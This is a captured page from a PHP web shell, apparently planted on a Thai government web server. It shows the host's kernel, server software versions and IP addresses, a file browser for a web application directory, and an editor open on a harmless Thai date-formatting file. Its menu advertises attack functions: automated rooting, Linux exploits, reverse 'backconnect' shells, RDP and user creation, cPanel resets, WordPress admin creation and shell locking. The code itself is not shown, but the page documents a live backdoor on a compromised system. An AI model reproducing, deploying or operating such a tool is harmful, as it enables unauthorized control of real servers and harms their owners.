Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
building /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
upload_files
[ DIR ]
drwxr-xr-x
default.php
258
B
-rw-r--r--
index.php
254
B
-rw-r--r--
menu.php
3.35
KB
-rw-r--r--
menu_mobile.php
589
B
-rw-r--r--
permission.php
10.75
KB
-rw-r--r--
time_inc.php
928
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : time_inc.php
<?php //date(yy/mm/dd) function thai_date_3($date){ if(!isset($date)){ return; } $thai_month_arr=array( "00"=>"-", "01"=>"ม.ค.", "02"=>"ก.พ", "03"=>"มี.ค", "04"=>"เม.ย.", "05"=>"พ.ค.", "06"=>"มิ.ย.", "07"=>"ก.ค.", "08"=>"ส.ค.", "09"=>"ก.ย.", "10"=>"ต.ค.", "11"=>"พ.ย.", "12"=>"ธ.ค." ); $f_date_2=explode(" ", $date); $f_date=explode("-", $f_date_2[0]); $f_date[2]=intval($f_date[2]); $thai_date_return=""; $thai_date_return.= $f_date[2]; $thai_date_return.= " ".$thai_month_arr[$f_date[1]]." "; $thai_date_return.= $f_date[0]+543; if($date!=""){ return $thai_date_return; } else{ $thai_date_return=""; return $thai_date_return; } } function getDateThai($date){ list($y,$m,$d) =preg_split("/-/",$date); $y=$y+543; return "$d/$m/$y"; } function getDateEng($date){ list($d,$m,$y)= explode("/",$date); $y=$y-543; return "$y-$m-$d"; } ?>
Close